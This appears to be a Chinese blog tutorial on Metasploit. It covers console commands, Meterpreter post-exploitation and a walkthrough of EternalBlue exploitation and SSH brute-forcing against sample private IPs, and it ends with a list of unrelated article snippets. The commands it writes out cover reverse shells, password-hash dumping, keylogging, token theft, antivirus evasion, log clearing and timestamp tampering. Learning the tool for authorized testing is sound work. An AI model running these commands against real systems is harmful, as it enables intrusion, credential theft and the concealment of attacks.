Metasploit Framework(MSF)使用教程与命令详解
Metasploit Framework(简称MSF)是一款功能强大的开源渗透测试工具,广泛应用于网络安全领域。它集成了大量的漏洞利用模块(exploits)、辅助模块(auxiliary)和载荷(payloads),为安全研究人员和渗透测试者提供了从信息收集到漏洞利用的全流程支持。本教程将详细介绍MSF的控制台(MSFconsole)基本命令、使用流程、Meterpreter功能以及实战案例,帮助读者快速上手并掌握其核心技巧。
一、MSF概述与安装
1.1 什么是Metasploit Framework?
Metasploit Framework由H.D. Moore于2003年首次发布,后由Rapid7公司维护。它最初是一个漏洞利用开发框架,现已发展为包含数千个模块的综合性渗透测试平台。MSF支持多种操作系统(如Windows、Linux、macOS),通过命令行界面(MSFconsole)或图形界面(如Armitage)操作。
MSF的核心组件包括:
- Exploits:漏洞利用模块,用于攻击目标系统。
- Payloads:攻击成功后执行的代码,如反弹shell。
- Auxiliary:辅助模块,用于扫描、嗅探等任务。
- Meterpreter:高级后门工具,提供丰富的后渗透功能。
1.2 安装MSF
在Linux(如Kali Linux)上安装MSF非常简单,因为Kali已预装Metasploit。若需手动安装,可按以下步骤操作:
- 更新系统:
sudo apt update && sudo apt upgrade -y - 安装Metasploit:
sudo apt install metasploit-framework -y - 初始化数据库:
msfdb init - 启动MSFconsole:
msfconsole
安装完成后,输入msfconsole -q即可进入控制台界面(-q:不显示欢迎信息)。
二、MSFconsole基本命令与使用流程
MSFconsole是MSF的主要交互界面,提供了丰富的命令用于模块管理、目标配置和攻击执行。以下是基本命令的详细说明。
2.1 模块查看与搜索
- show exploits:显示所有漏洞利用模块。
- 示例:输入
show exploits,查看可用exploit列表,如windows/smb/ms17_010_eternalblue。
- 示例:输入
- show payloads:显示所有载荷。
- 示例:输入
show payloads,列出如windows/meterpreter/reverse_tcp。
- 示例:输入
- show auxiliary:显示所有辅助模块。
- 示例:输入
show auxiliary,查看扫描模块如auxiliary/scanner/portscan/tcp。
- 示例:输入
- search :搜索模块。
- 示例:
search smb查找与SMB相关的模块,返回结果带索引号。
- 示例:
2.2 模块加载与信息查看
- use :加载指定模块。
- 示例:
use windows/smb/psexec加载Psexec模块。
- 示例:
- use :通过搜索结果的索引号加载模块。
- 示例:
search smb后显示0: windows/smb/psexec,输入use 0。
- 示例:
- info:查看模块详细信息。
- 示例:在
use windows/smb/psexec后输入info,显示描述、选项和参考。
- 示例:在
2.3 参数配置
- set :设置特定参数。
- 示例:
set RHOST 192.168.1.10设置目标IP。
- 示例:
- setg :全局设置参数。
- 示例:
setg LHOST 192.168.1.100全局设置本地IP。
- 示例:
- show options:显示模块选项。
- 示例:输入后查看
RHOST、LHOST等是否正确配置。
- 示例:输入后查看
- show targets:显示支持的目标类型。
- 示例:列出目标操作系统版本。
- set target :指定目标类型。
- 示例:
set target 1选择Windows 7 SP1。
- 示例:
- set payload :设置载荷。
- 示例:
set payload windows/meterpreter/reverse_tcp。
- 示例:
- set payload :通过索引设置载荷。
- 示例:
show payloads后用set payload 0。
- 示例:
2.4 执行与管理
- check:检查目标是否易受攻击。
- 示例:
check返回“Target is vulnerable”或“Not vulnerable”。
- 示例:
- exploit:执行攻击。
- 示例:
exploit启动漏洞利用。
- 示例:
- exploit -j:后台运行攻击。
- 示例:
exploit -j后可用sessions -l查看会话。
- 示例:
- exploit -z:成功后不交互。
- 示例:适合自动化脚本。
- exploit -e :指定编码器。
- 示例:
exploit -e shikata_ga_nai绕过杀软。
- 示例:
- sessions -l:列出会话。
- 示例:显示所有Meterpreter或shell会话。
- sessions -i :进入指定会话。
- 示例:
sessions -i 1进入会话1。
- 示例:
2.5 使用流程示例
- 启动MSFconsole:
msfconsole。 - 搜索模块:
search eternalblue。 - 加载模块:
use exploit/windows/smb/ms17_010_eternalblue。 - 查看选项:
show options。 - 设置参数:
set RHOST 192.168.1.10 set LHOST 192.168.1.100 set payload windows/meterpreter/reverse_tcp - 检查漏洞:
check。 - 执行攻击:
exploit。 - 查看会话:
sessions -l。
三、Meterpreter高级功能
Meterpreter是MSF的标志性后门工具,提供强大的后渗透能力。成功利用漏洞后,可通过Meterpreter控制目标系统。
3.1 基本命令
- help:显示帮助信息。
- sysinfo:查看系统信息。
- 示例:返回“OS: Windows 10, Architecture: x64”。
- ps:列出进程。
- 示例:显示PID、进程名和用户。
- migrate :迁移到指定进程。
- 示例:
migrate 1234迁移到 explorer.exe。
- 示例:
- shell:进入交互式shell。
- 示例:运行
cmd.exe。
- 示例:运行
3.2 权限提升与伪装
- getsystem:尝试提权至SYSTEM。
- 示例:成功后拥有最高权限。
- use incognito:加载伪装模块。
- list_tokens -u:列出用户令牌。
- impersonate_token <DOMAIN\USER>:伪装为指定用户。
- 示例:
impersonate_token "DOMAIN\Admin"。
- 示例:
- steal_token :窃取进程令牌。
3.3 文件与键盘操作
- upload :上传文件。
- 示例:
upload /tmp/malware.exe C:\Windows\Temp。
- 示例:
- download :下载文件。
- 示例:
download C:\Users\user\secret.txt。
- 示例:
- keyscan_start:开始键盘记录。
- keyscan_dump:导出记录。
- keyscan_stop:停止记录。
3.4 系统管理
- hashdump:导出密码哈希。
- 示例:获取SAM数据库中的NTLM哈希。
- clearev:清除事件日志。
- timestomp:修改文件时间戳。
- 示例:
timestomp C:\file.txt -z抹除痕迹。
- 示例:
- reboot:重启目标。
3.5 网络嗅探
- use sniffer:加载嗅探模块。
- sniffer_interfaces:列出网络接口。
- sniffer_start :开始嗅探。
- 示例:
sniffer_start 1捕获数据包。
- 示例:
四、数据库与辅助功能
4.1 数据库操作
MSF支持数据库存储扫描结果,提升效率。
- db_create :创建数据库。
- 示例:
db_create mydb。
- 示例:
- db_connect :连接数据库。
- 示例:
db_connect mydb。
- 示例:
- db_nmap:运行Nmap并保存结果。
- 示例:
db_nmap -sT -v 192.168.1.0/24。
- 示例:
- db_destroy:删除数据库。
- 示例:
db_destroy mydb。
- 示例:
4.2 辅助模块
辅助模块用于信息收集、扫描等任务。
- 示例:端口扫描
use auxiliary/scanner/portscan/tcp set RHOSTS 192.168.1.0/24 set PORTS 1-1000 run
五、实战案例
5.1 EternalBlue漏洞利用
场景:攻击Windows 7目标(IP: 192.168.1.10)。
- 启动MSFconsole。
- 加载模块:
use exploit/windows/smb/ms17_010_eternalblue。 - 配置参数:
set RHOST 192.168.1.10 set LHOST 192.168.1.100 set payload windows/meterpreter/reverse_tcp - 检查:
check(返回“Vulnerable”)。 - 执行:
exploit。 - 进入Meterpreter:
sessions -i 1。 - 提权:
getsystem。 - 下载文件:
download C:\Windows\system32\config\SAM。
5.2 弱密码爆破
场景:爆破SSH服务(IP: 192.168.1.20)。
- 加载模块:
use auxiliary/scanner/ssh/ssh_login。 - 配置:
set RHOSTS 192.168.1.20 set USERNAME root set PASS_FILE /usr/share/wordlists/rockyou.txt - 运行:
run。 - 成功后进入会话:
sessions -i 1。
六、使用技巧与注意事项
6.1 优化技巧
- 后台运行:用
exploit -j和sessions -l管理多目标。 - 自动化脚本:设置
set autorunscript migrate -f自动迁移进程。 - 编码绕过:用
exploit -e shikata_ga_nai躲避检测。
6.2 注意事项
- 合法性:仅在授权环境下使用MSF。
- 稳定性:避免过多线程(如
-t 1000)导致目标崩溃。 - 更新:定期运行
msfupdate更新模块。
七、总结
Metasploit Framework以其强大的模块化和灵活性,成为渗透测试的必备工具。通过本教程,你已掌握MSFconsole的基本命令、Meterpreter功能和实战应用。无论是漏洞利用还是后渗透操作,MSF都能提供高效支持。建议读者结合靶场(如Hack The Box)反复实践,提升技能。
相关文章:
Metasploit Framework(MSF)使用教程与命令详解
Metasploit Framework(简称MSF)是一款功能强大的开源渗透测试工具,广泛应用于网络安全领域。它集成了大量的漏洞利用模块(exploits)、辅助模块(auxiliary)和载荷(payloads࿰…...
进程间通信(1)——管道
1. 进程间通信简介 进程间通信(Inter-Process Communication,IPC)是指不同进程之间交换数据的机制。由于进程具有独立的地址空间,它们无法直接访问彼此的数据,因此需要IPC机制来实现信息共享、数据传递或同步操作。 …...
python基础8 单元测试
通过前面的7个章节,作者学习了python的各项基础知识,也学习了python的编译和执行。但在实际环境上,我们需要验证我们的代码功能符合我们的设计预期,所以需要结合python的单元测试类,编写单元测试代码。 Python有一个内…...
【正点原子K210连载】第七十六章 音频FFT实验 摘自【正点原子】DNK210使用指南-CanMV版指南
第七十六章 音频FFT实验 本章将介绍CanMV下FFT的应用,通过将时域采集到的音频数据通过FFT为频域。通过本章的学习,读者将学习到CanMV下控制FFT加速器进行FFT的使用。 本章分为如下几个小节: 32.1 maix.FFT模块介绍 32.2 硬件设计 32.3 程序设…...
【杂记二】git, github, vscode等
一、前言 暂时空着... 二、git 2.1 可能的疑问 1. VSCode 项目名和 GitHub 仓库名是否需要一致? 不需要一致。 VSCode 项目名(也就是你本地的文件夹名字)和 GitHub 仓库名可以不一样。 Git 是一个分布式版本控制系统,它主要关…...
《基于Spring Boot+Vue的智慧养老系统的设计与实现》开题报告
个人主页:@大数据蟒行探索者 一、研究背景及国内外研究现状 1.研究背景 根据1982年老龄问题世界大会联合国制定的标准,如果一个国家中超过65岁的老人占全国总人口的7%以上,或者超过60岁的老人占全国总人口的10%以上,那么这个国家将被定义为“老龄化社会”[1]。 随着国…...
ModBus TCP/RTU互转(主)(从)|| Modbus主动轮询下发的工业应用 || 基于智能网关的串口服务器进行Modbus数据收发的工业应用
目录 前言 一、ModBus TCP/RTU互转(从)及应用|| 1.1 举栗子 二、ModBus TCP/RTU互转(主) 2.1 举栗子 三、ModBus 主动轮询 3.1 Modbus主动轮询原理 3.2 Modbus格式上传与下发 3.2.1.设置Modbus主动轮询指令 3.2.2 设…...
【设计模式】3W 学习法深入剖析创建型模式:原理、实战与开源框架应用(含 Java 代码)
3W 学习法总结创建型模式(附 Java 代码实战及开源框架应用) 创建型模式主要关注 对象的创建,旨在提高代码的可复用性、可扩展性和灵活性。本文采用 3W 学习法(What、Why、How),深入分析 五大创建型模式&am…...
Jobby、Quarkus 和 Spring Boot对比
Jobby、Quarkus 和 Spring Boot 是三种不同的 Java 框架,各自有不同的设计目标和适用场景。以下是对它们的详细对比: 1. 设计目标 框架设计目标Jobby轻量级的任务调度框架,专注于任务调度和执行。Quarkus面向云原生和 Kubernetes 的 Java 框…...
[代码规范]1_良好的命名规范能减轻工作负担
欢迎来到啾啾的博客🐱,一个致力于构建完善的Java程序员知识体系的博客📚,记录学习的点滴,分享工作的思考、实用的技巧,偶尔分享一些杂谈💬。 欢迎评论交流,感谢您的阅读😄…...
【HarmonyOS Next之旅】DevEco Studio使用指南(三)
目录 1 -> 一体化工程迁移 1.1 -> 自动迁移 1.2 -> 手动迁移 1.2.1 -> API 10及以上历史工程迁移 1.2.2 -> API 9历史工程迁移 1 -> 一体化工程迁移 DevEco Studio从 NEXT Developer Beta1版本开始,提供开箱即用的开发体验,将SD…...
冯・诺依曼架构深度解析
一、历史溯源:计算机科学的革命性突破 1.1 前冯・诺依曼时代 在 1940 年代之前,计算机领域呈现 "百家争鸣" 的格局: 哈佛 Mark I(1944):采用分离的指令存储与数据存储ENIAC(1946&a…...
gralloc1_perform具体在干什么
gralloc1_perform 会在特定场景下通过 ioctl 调用,执行 缓存 (cache) 管理 和 内存映射 操作,确保 CPU 和 GPU 之间的数据一致性。 📌 为什么需要对 cache 进行操作? 在 Android 系统中,CPU 和 GPU 通常共享 DDR 内存…...
安装配置Anaconda,配置VSCode
文章目录 Anaconda介绍下载Anaconda安装Anaconda换源创建一个新环境conda常用命令 VSCode环境配置 记录一下笔者收集的一些资料,不喜勿喷。 Anaconda介绍 Anaconda是一个用于科学计算的Python发行版,支持 Linux, Mac, Windows系统,提供了包管…...
【愚公系列】《高效使用DeepSeek》017-知识点思维导图生成
🌟【技术大咖愚公搬代码:全栈专家的成长之路,你关注的宝藏博主在这里!】🌟 📣开发者圈持续输出高质量干货的"愚公精神"践行者——全网百万开发者都在追更的顶级技术博主! 👉 江湖人称"愚公搬代码",用七年如一日的精神深耕技术领域,以"…...
【量化策略】网格交易策略
【量化策略】网格交易策略 🚀量化软件开通 🚀量化实战教程 技术背景与应用场景 网格交易策略是一种基于市场波动性的自动化交易方法,适用于震荡市场。它通过在预设的价格区间内设置多个买卖点,自动执行低买高卖的操作…...
C++ 语法之函数和函数指针
在上一章中 C 语法之 指针的一些应用说明-CSDN博客 我们了解了指针变量,int *p;取变量a的地址这些。 那么函数同样也有个地址,直接输出函数名就可以得到地址,如下: #include<iostream> using namespace std; void fun() …...
网络协议抓取与分析(SSL Pinning突破)
1. 网络协议逆向基础 1.1 网络协议分析流程 graph TD A[抓包环境配置] --> B[流量捕获] B --> C{协议类型} C -->|HTTP| D[明文解析] C -->|HTTPS| E[SSL Pinning突破] D --> F[参数逆向] E --> F F --> G[协议重放与模拟] 1.1.1 关键分析目标…...
蓝桥杯真题——洛谷Day13 找规律(修建灌木)、字符串(乘法表)、队列(球票)
目录 找规律 P8781 [蓝桥杯 2022 省 B] 修剪灌木 字符串 P8723 [蓝桥杯 2020 省 AB3] 乘法表 队列 P8641 [蓝桥杯 2016 国 C] 赢球票 找规律 P8781 [蓝桥杯 2022 省 B] 修剪灌木 思路:对某个特定的点来说有向前和向后的情况,即有向前再返回到该位置…...
【2025】基于Springboot + vue实现的毕业设计选题系统
项目描述 本系统包含管理员、学生、教师三个角色。 管理员角色: 用户管理:管理系统中所有用户的信息,包括添加、删除和修改用户。 配置管理:管理系统配置参数,如上传图片的路径等。 权限管理:分配和管理…...
JAVA并发编程 --- 补充内容
1 线程状态 1.1 状态介绍 当线程被创建并启动以后,它既不是一启动就进入了执行状态,也不是一直处于执行状态。线程对象在不同的时期有不同的状态。那么Java中的线程存在哪几种状态呢?Java中的线程 状态被定义在了java.lang.Thread.State枚…...
ADB三个模块介绍
ADB(Android Debug Bridge)是 Android 开发中非常重要的工具,它由 3 个主要模块 组成,分别是 ADB Client(客户端)、ADB Server(服务端) 和 ADB Daemon(守护进程ÿ…...
【ArduPilot】Windows下使用Optitrack通过MAVProxy连接无人机实现定位与导航
Windows下使用Optitrack通过MAVProxy连接无人机实现定位与导航 配置动捕系统无人机贴动捕球配置无人机参数使用MAVProxy连接Optitrack1、连接无人机3、设置跟踪刚体ID4、校正坐标系5、配置IP地址(非Loopback模式)6、启动动捕数据推流 结语 在GPS信号弱或…...
qt 图像后处理的软件一
这是一个图像后处理软件刚刚,目前功能比较单一,后续会丰富常用的功能。 目前实现的功能有 1.导入图像 2图像可中心缩放(右上角放大缩小,按钮及滚轮双重可控)。 3.图像重置功能 软件界面如下。 代码放在我的资源里…...
Ardunio 连接OLED触摸屏(SSD1106驱动 4针 IIC通信)
一、准备工作 1、硬件 UNO R3 :1套 OLED触摸屏:1套 导线诺干 2、软件 arduino 二、接线 UNO R3OLED5VVCCGNDGNDA5SCLA4SDA 脚位如下图所示: Uno R3脚位图 触摸屏脚位图 查阅显示屏的驱动规格:通常显示屏驱动芯片有SSD1306,SH110…...
深度学习 第4章 数值计算和 Deepseek 的实践
第4章 数值计算和 Deepseek 的实践 章节概述 本章主要探讨了数值计算中的关键问题,这些问题在深度学习和机器学习中尤为重要。数值计算的核心挑战在于如何在有限的计算资源和精度限制下,高效且稳定地处理连续数学问题。本章首先讨论了溢出和下溢问题&a…...
【数据分享】2000—2024年我国省市县三级逐年归一化植被指数(NDVI)数据(年最大值/Shp/Excel格式)
之前我们分享过2000-2024年我国逐年的归一化植被指数(NDVI)栅格数据,该逐年数据是取的当年月归一化植被指数(NDVI)的年最大值。(可查看之前的文章获悉详情)!该数据来源于NASA定期发布…...
HW华为流程管理体系精髓提炼华为流程运营体系(124页PPT)(文末有下载方式)
资料解读:HW华为流程管理体系精髓提炼华为流程运营体系(124页PPT) 详细资料请看本解读文章的最后内容。 华为作为全球领先的科技公司,其流程管理体系的构建与运营是其成功的关键之一。本文将从华为流程管理体系的核心理念、构建…...
Linux中管理多版本Python总结
1. pyenv 管理多个 Python 版本 pyenv 是一个流行的工具,用于管理多个 Python 版本。它可以轻松安装、切换和管理不同版本的 Python。 1.1.安装 pyenv 1.1.1安装依赖 sudo apt-get update sudo apt-get install -y make build-essential libssl-dev zlib1g-dev…...
【系统架构设计师】操作系统 - 特殊操作系统 ③ ( 微内核操作系统 | 单体内核 操作系统 | 内核态 | 用户态 | 单体内核 与 微内核 对比 )
文章目录 一、微内核操作系统1、单体内核 操作系统2、微内核操作系统 引入3、微内核操作系统 概念4、微内核操作系统 案例 二、单体内核 与 微内核 对比1、功能对比2、单体内核 优缺点3、微内核 优缺点 一、微内核操作系统 1、单体内核 操作系统 单体内核 操作系统 工作状态 : …...
